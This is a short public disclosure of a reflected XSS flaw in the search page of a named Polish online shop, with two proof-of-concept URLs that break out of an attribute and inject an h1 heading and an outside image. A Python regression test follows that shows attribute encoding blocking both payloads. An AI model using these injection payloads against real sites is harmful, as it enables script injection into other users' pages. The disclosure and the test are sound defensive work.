Webroot's Polish online shop vulnerable to the same XSS for 5 years
I discovered an XSS vulnerability on Webroot's Polish online shop 5 years ago. Today I thought that maybe I should check whether they learn from past mistakes. I checked the same page: http://wrpolska.pl/sklep/search.php and it turned out to still be vulnerable to the same XSS I found 5 years ago... PoC:
Code
http://wrpolska.pl/sklep/search.php?orderby=position&orderway=desc&search_query="><h1>XSS found by Team Elite</h1>
Code
http://wrpolska.pl/sklep/search.php?orderby=position&orderway=desc&search_query="><img src=http://te-home.net/images/logo.png>
Webroot has an article on their website titled: What exactly is Cross Site Scripting (XSS). Maybe it's time to use knowledge from this article to protect yourself?
Note: This is a proof of concept and it doesn't reflect the views or interests of the above websites.
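A regression check of the kind that keeps a reflection like this from coming back, added here as an example and not code from the original post or from the shop. The template, the function names and the assumption that search_query is echoed into an input's value attribute (inferred from the "> prefix in the PoC) are constructed for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Constructed template: the shop's real markup is not shown in the post.
# Assumption: search_query is echoed back into the search box's value attribute.
TEMPLATE = ('<form action="search.php">'
            '<input type="text" name="search_query" value="{q}"></form>')

def render_vulnerable(query):
    """Place the parameter in the attribute unchanged (the reported behaviour)."""
    return TEMPLATE.format(q=query)

def render_hardened(query):
    """Encode &, <, >, " and ' before the value enters the attribute."""
    return TEMPLATE.format(q=escape(query, quote=True))

class _Collector(HTMLParser):
    """Record the element sequence and what the input's value attribute holds."""
    def __init__(self):
        super().__init__()
        self.tags, self.values = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.values.append(dict(attrs).get("value"))

def parse(html_text):
    collector = _Collector()
    collector.feed(html_text)
    collector.close()
    return collector.tags, collector.values

def reflects_markup(render, query):
    """True if the query alters the element structure or fails to round-trip
    as plain attribute data, i.e. it was reflected without encoding."""
    baseline_tags, _ = parse(render("probe"))
    tags, values = parse(render(query))
    return tags != baseline_tags or values != [query]

# The two search_query values from the PoC URLs in the post.
POC_QUERIES = ['"><h1>XSS found by Team Elite</h1>',
               '"><img src=http://te-home.net/images/logo.png>']

if __name__ == "__main__":
    for q in POC_QUERIES:
        print(reflects_markup(render_vulnerable, q), reflects_markup(render_hardened, q))
```

Run against a test build's rendering function in CI, the same check fails the build whenever either PoC value stops round-tripping as inert attribute data.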